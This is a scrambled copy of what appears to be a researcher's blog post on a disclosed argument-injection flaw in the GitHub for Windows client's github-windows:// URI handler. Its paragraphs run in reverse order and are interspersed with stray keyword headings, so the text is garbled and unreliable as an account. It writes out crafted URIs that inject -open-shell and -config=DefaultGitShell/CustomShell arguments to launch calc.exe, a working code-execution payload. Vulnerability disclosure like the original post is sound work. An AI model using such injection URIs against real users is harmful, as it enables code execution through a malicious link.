Github-windows://a" -config=CustomShell="C:\\windows\\system32\\calc.exe CustomShell - The path to a shell when DefaultGitShell is set to “Custom”.īy crafting these variables, and launching a shell with “–open-shell” argument, we can achieve RCE, for example: github-windows://a" -config=DefaultGitShell="Custom.DefaultGitShell - The type of shell to open when “–open-shell” is requested, or set to “Custom” to launch an executable listed in “CustomShell”.So how can we turn this into RCE? Well for this we look to the –config option, specifically the following variables: To see if the client is vulnerable to argument injection, we can craft a URI as follows: GitHub-Windows://a" -open-shell=" reinstall-shortcuts Reinstall GitHub Desktop and Git Shell shortcuts Sets the working directory of this instance. p, -path=VALUE Selects the repository specified by the path. u, -url=VALUE Clone the specified GitHub repository uninstall Uninstall the url protocol from the registry delete-credentials Clear all locally cached credentials delete-cache Clean all locally cached data
#Github desktop windows install#
install Install the url protocol into the registry credentials=VALUE Credential caching api for use with Git Specifying the working directory is optional.
With this in mind, let’s review the command line arguments that GitHub supports: -open-shell Open a Git Shell to the working directory. Malicious parties could use additional quote or backslash characters to pass additional command line parameters. The string that is passed to a pluggable protocol handler might be broken across multiple parameters. Reviewing the Microsoft documentation on URI handlers, we find a number of security warnings, for example: This means that when the URI is invoked as “github-windows://openRepo/ ", the following command is executed: C:\Users\xpn\AppData\Local\Apps\2.0\R0M6MET2.YQR\DGEMRHGK.Z2O\gith.tion_317444273a93ac29_0003.0000_c74cce3a838f9354\GitHub.exe" -u="github-windows://openRepo/" Looking at GitHub, we find the following registry key has been added: Ĭ:\Users\xpn\AppData\Local\Apps\2.0\R0M6MET2.YQR\DGEMRHGK.Z2O\gith.tion_317444273a93ac29_0003.0000_c74cce3a838f9354\GitHub.exe" -u="%1"Īs we can see, an argument of -u is provided to the client, with the URI value encoded within quotation marks. Microsoft allow applications to register new URI handlers via the registry by providing a command to execute along with the URI parameters. In the example above, a URI to the Metasploit-Framework would be: github-windows://openRepo/ This button is implemented via a registered URI handler installed by the client. In addition, GitHub provide the ability for users to clone an online repo via a button presented on the project page:
#Github desktop windows windows#
The GitHub for Windows client provides users with an easy way to manage their GitHub repo’s, from pushing to GitHub for the first time, to creating pull requests. The aim of this post is to give a quick rundown of how the issue was discovered, and to introduce this type of vulnerability for those that may not have seen it before. Recently GitHub disclosed a vulnerability which I reported within the GitHub for Windows client.
0 kommentar(er)
